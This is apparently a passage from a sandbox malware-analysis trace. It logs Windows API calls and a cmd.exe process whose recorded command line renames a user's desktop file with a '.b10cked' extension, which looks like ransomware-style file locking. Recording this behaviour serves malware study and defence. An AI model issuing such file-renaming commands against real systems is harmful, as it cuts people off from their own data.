0x4c [0224.709] WriteFile (in: hFile=0x4c, lpBuffer=0x18f368*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f368*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.709] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.709] GetFileType (hFile=0x4c) returned 0x1 [0224.709] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.709] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3b8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f3b8*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.709] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.709] GetFileType (hFile=0x4c) returned 0x1 [0224.709] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.709] WriteFile (in: hFile=0x4c, lpBuffer=0x18f408*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f408*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.709] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.709] GetFileType (hFile=0x4c) returned 0x1 [0224.709] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.709] WriteFile (in: hFile=0x4c, lpBuffer=0x18f458*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f458*, lpNumberOfBytesWritten=0x18e45c*=0x20, lpOverlapped=0x0) returned 1 [0224.709] _get_osfhandle (_FileHandle=4) returned 0x54 [0224.709] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e448 | out: lpNewFilePointer=0x0) returned 1 [0224.709] _get_osfhandle (_FileHandle=4) returned 0x54 [0224.709] ReadFile (in: hFile=0x54, lpBuffer=0x18f278, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e468, lpOverlapped=0x0 | out: lpBuffer=0x18f278*, lpNumberOfBytesRead=0x18e468*=0x200, lpOverlapped=0x0) returned 1 [0224.709] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.709] GetFileType (hFile=0x4c) returned 0x1 [0224.709] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.709] GetFileType (hFile=0x4c) returned 0x1 [0224.709] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.709] WriteFile (in: hFile=0x4c, lpBuffer=0x18f278*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f278*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.709] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.710] GetFileType (hFile=0x4c) returned 0x1 [0224.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.710] WriteFile (in: hFile=0x4c, lpBuffer=0x18f2c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f2c8*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.710] GetFileType (hFile=0x4c) returned 0x1 [0224.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.710] WriteFile (in: hFile=0x4c, lpBuffer=0x18f318*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f318*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.710] GetFileType (hFile=0x4c) returned 0x1 [0224.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.710] WriteFile (in: hFile=0x4c, lpBuffer=0x18f368*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f368*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.710] GetFileType (hFile=0x4c) returned 0x1 [0224.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.710] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3b8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f3b8*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.710] GetFileType (hFile=0x4c) returned 0x1 [0224.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.710] WriteFile (in: hFile=0x4c, lpBuffer=0x18f408*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f408*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.710] GetFileType (hFile=0x4c) returned 0x1 [0224.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.710] WriteFile (in: hFile=0x4c, lpBuffer=0x18f458*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f458*, lpNumberOfBytesWritten=0x18e45c*=0x20, lpOverlapped=0x0) returned 1 [0224.710] _get_osfhandle (_FileHandle=4) returned 0x54 [0224.710] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e448 | out: lpNewFilePointer=0x0) returned 1 [0224.710] _get_osfhandle (_FileHandle=4) returned 0x54 [0224.710] ReadFile (in: hFile=0x54, lpBuffer=0x18f278, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e468, lpOverlapped=0x0 | out: lpBuffer=0x18f278*, lpNumberOfBytesRead=0x18e468*=0x200, lpOverlapped=0x0) returned 1 [0224.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.710] GetFileType (hFile=0x4c) returned 0x1 [0224.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.711] GetFileType (hFile=0x4c) returned 0x1 [0224.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.711] WriteFile (in: hFile=0x4c, lpBuffer=0x18f278*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f278*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.711] GetFileType (hFile=0x4c) returned 0x1 [0224.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.711] WriteFile (in: hFile=0x4c, lpBuffer=0x18f2c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f2c8*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.711] GetFileType (hFile=0x4c) returned 0x1 [0224.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.711] WriteFile (in: hFile=0x4c, lpBuffer=0x18f318*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f318*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.711] GetFileType (hFile=0x4c) returned 0x1 [0224.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.711] WriteFile (in: hFile=0x4c, lpBuffer=0x18f368*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f368*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.711] GetFileType (hFile=0x4c) returned 0x1 [0224.977] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.977] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3b8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f3b8*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.977] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.977] GetFileType (hFile=0x4c) returned 0x1 [0224.977] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.977] WriteFile (in: hFile=0x4c, lpBuffer=0x18f408*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f408*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.977] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.977] GetFileType (hFile=0x4c) returned 0x1 [0224.977] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.977] WriteFile (in: hFile=0x4c, lpBuffer=0x18f458*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f458*, lpNumberOfBytesWritten=0x18e45c*=0x20, lpOverlapped=0x0) returned 1 [0224.977] _get_osfhandle (_FileHandle=4) returned 0x54 [0224.977] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e448 | out: lpNewFilePointer=0x0) returned 1 [0224.977] _get_osfhandle (_FileHandle=4) returned 0x54 [0224.977] ReadFile (in: hFile=0x54, lpBuffer=0x18f278, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e468, lpOverlapped=0x0 | out: lpBuffer=0x18f278*, lpNumberOfBytesRead=0x18e468*=0x200, lpOverlapped=0x0) returned 1 [0224.977] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.978] GetFileType (hFile=0x4c) returned 0x1 [0224.978] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.978] GetFileType (hFile=0x4c) returned 0x1 [0224.978] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.978] WriteFile (in: hFile=0x4c, lpBuffer=0x18f278*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f278*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.978] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.978] GetFileType (hFile=0x4c) returned 0x1 [0224.978] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.978] WriteFile (in: hFile=0x4c, lpBuffer=0x18f2c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f2c8*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.978] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.978] GetFileType (hFile=0x4c) returned 0x1 [0224.978] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.978] WriteFile (in: hFile=0x4c, lpBuffer=0x18f318*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f318*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.978] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.978] GetFileType (hFile=0x4c) returned 0x1 [0224.978] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.978] WriteFile (in: hFile=0x4c, lpBuffer=0x18f368*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f368*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.978] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.978] GetFileType (hFile=0x4c) returned 0x1 [0224.978] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.978] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3b8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f3b8*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.979] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.979] GetFileType (hFile=0x4c) returned 0x1 [0224.979] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.979] WriteFile (in: hFile=0x4c, lpBuffer=0x18f408*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f408*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.979] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.979] GetFileType (hFile=0x4c) returned 0x1 [0224.979] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.979] WriteFile (in: hFile=0x4c, lpBuffer=0x18f458*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f458*, lpNumberOfBytesWritten=0x18e45c*=0x20, lpOverlapped=0x0) returned 1 [0224.979] _get_osfhandle (_FileHandle=4) returned 0x54 [0224.979] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e448 | out: lpNewFilePointer=0x0) returned 1 [0224.979] _get_osfhandle (_FileHandle=4) returned 0x54 [0224.979] ReadFile (in: hFile=0x54, lpBuffer=0x18f278, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e468, lpOverlapped=0x0 | out: lpBuffer=0x18f278*, lpNumberOfBytesRead=0x18e468*=0x200, lpOverlapped=0x0) returned 1 [0224.979] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.979] GetFileType (hFile=0x4c) returned 0x1 [0224.979] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.979] GetFileType (hFile=0x4c) returned 0x1 [0224.979] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.979] WriteFile (in: hFile=0x4c, lpBuffer=0x18f278*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f278*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.979] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.979] GetFileType (hFile=0x4c) returned 0x1 [0224.979] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.979] WriteFile (in: hFile=0x4c, lpBuffer=0x18f2c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f2c8*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.980] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.980] GetFileType (hFile=0x4c) returned 0x1 [0224.980] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.980] WriteFile (in: hFile=0x4c, lpBuffer=0x18f318*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f318*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.980] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.980] GetFileType (hFile=0x4c) returned 0x1 [0224.980] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.980] WriteFile (in: hFile=0x4c, lpBuffer=0x18f368*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f368*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.980] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.980] GetFileType (hFile=0x4c) returned 0x1 [0224.980] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.980] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3b8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f3b8*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.980] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.980] GetFileType (hFile=0x4c) returned 0x1 [0224.980] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.980] WriteFile (in: hFile=0x4c, lpBuffer=0x18f408*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f408*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.980] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.980] GetFileType (hFile=0x4c) returned 0x1 [0224.980] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.980] WriteFile (in: hFile=0x4c, lpBuffer=0x18f458*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f458*, lpNumberOfBytesWritten=0x18e45c*=0x20, lpOverlapped=0x0) returned 1 [0224.980] _get_osfhandle (_FileHandle=4) returned 0x54 [0224.981] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e448 | out: lpNewFilePointer=0x0) returned 1 [0224.981] _get_osfhandle (_FileHandle=4) returned 0x54 [0224.981] ReadFile (in: hFile=0x54, lpBuffer=0x18f278, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e468, lpOverlapped=0x0 | out: lpBuffer=0x18f278*, lpNumberOfBytesRead=0x18e468*=0x32, lpOverlapped=0x0) returned 1 [0224.981] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.981] GetFileType (hFile=0x4c) returned 0x1 [0224.981] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.981] GetFileType (hFile=0x4c) returned 0x1 [0224.981] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.981] WriteFile (in: hFile=0x4c, lpBuffer=0x18f278*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f278*, lpNumberOfBytesWritten=0x18e45c*=0x32, lpOverlapped=0x0) returned 1 [0224.981] _get_osfhandle (_FileHandle=4) returned 0x54 [0224.981] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e448 | out: lpNewFilePointer=0x0) returned 1 [0224.981] _close (_FileHandle=4) returned 0 [0224.981] FindNextFileW (in: hFindFile=0x230e88, lpFindFileData=0x18f4dc | out: lpFindFileData=0x18f4dc) returned 0 [0224.982] GetLastError () returned 0x12 [0224.982] FindClose (in: hFindFile=0x230e88 | out: hFindFile=0x230e88) returned 1 [0224.982] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0224.983] _close (_FileHandle=3) returned 0 [0224.983] _get_osfhandle (_FileHandle=1) returned 0x7 [0224.983] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0224.983] _get_osfhandle (_FileHandle=1) returned 0x7 [0224.983] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49e241ac | out: lpMode=0x49e241ac) returned 1 [0224.983] _get_osfhandle (_FileHandle=0) returned 0x3 [0224.983] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49e241b0 | out: lpMode=0x49e241b0) returned 1 [0224.983] SetConsoleInputExeNameW () returned 0x1 [0224.983] GetConsoleOutputCP () returned 0x1b5 [0224.984] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e24260 | out: lpCPInfo=0x49e24260) returned 1 [0224.984] SetThreadUILanguage (LangId=0x0) returned 0x409 [0224.984] exit (_Code=0) Process: id = "589" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16780" os_pid = "0xf74" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\65OAv.bmp\" \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\65OAv.bmp.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 33579 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 33580 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 33581 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 33582 start_va = 0x1b0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 33583 start_va = 0x49e00000 end_va = 0x49e4bfff entry_point = 0x49e00000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 33584 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 33585 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 33586 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 33587 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 33588 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 33765 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 33766 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 33767 start_va = 0x50000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 33768 start_va = 0x2b0000 end_va = 0x316fff entry_point = 0x2b0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 33769 start_va = 0x490000 end_va = 0x49ffff entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 33770 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 33771 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 33772 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 33773 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 33774 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 33775 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 33776 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 33777 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 33778 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 33779 start_va = 0x320000 end_va = 0x3e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000320000" filename = "" Region: id = 33780 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 33781 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 33782 start_va = 0x150000 end_va = 0x156fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 33783 start_va = 0x160000 end_va = 0x161fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 33784 start_va = 0x170000 end_va = 0x170fff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 33785 start_va = 0x180000 end_va = 0x180fff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 33786 start_va = 0x4a0000 end_va = 0x5a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004a0000" filename = "" Region: id = 33787 start_va = 0x5b0000 end_va = 0x11affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 33788 start_va = 0x11b0000 end_va = 0x1312fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011b0000" filename = "" Thread: id = 812 os_tid = 0xef0 [0225.162] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2afe9c | out: lpSystemTimeAsFileTime=0x2afe9c*(dwLowDateTime=0xb9c48dc0, dwHighDateTime=0x1d440a9)) [0225.162] GetCurrentProcessId () returned 0xf74 [0225.162] GetCurrentThreadId () returned 0xef0 [0225.162] GetTickCount () returned 0x3e2b0 [0225.162] QueryPerformanceCounter (in: lpPerformanceCount=0x2afe94 | out: lpPerformanceCount=0x2afe94*=28195141866) returned 1 [0225.163] GetModuleHandleA (lpModuleName=0x0) returned 0x49e00000 [0225.163] __set_app_type (_Type=0x1) [0225.163] __p__fmode () returned 0x76b331f4 [0225.163] __p__commode () returned 0x76b331fc [0225.163] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49e221a6) returned 0x0 [0225.163] __getmainargs (in: _Argc=0x49e24238, _Argv=0x49e24240, _Env=0x49e2423c, _DoWildCard=0, _StartInfo=0x49e24140 | out: _Argc=0x49e24238, _Argv=0x49e24240, _Env=0x49e2423c) returned 0 [0225.163] GetCurrentThreadId () returned 0xef0 [0225.164] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xef0) returned 0x38 [0225.164] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0225.164] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0225.164] SetThreadUILanguage (LangId=0x0) returned 0x409 [0225.164] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0225.164] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2afe2c | out: phkResult=0x2afe2c*=0x0) returned 0x2 [0225.164] VirtualQuery (in: lpAddress=0x2afe63, lpBuffer=0x2afdfc, dwLength=0x1c | out: lpBuffer=0x2afdfc*(BaseAddress=0x2af000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c 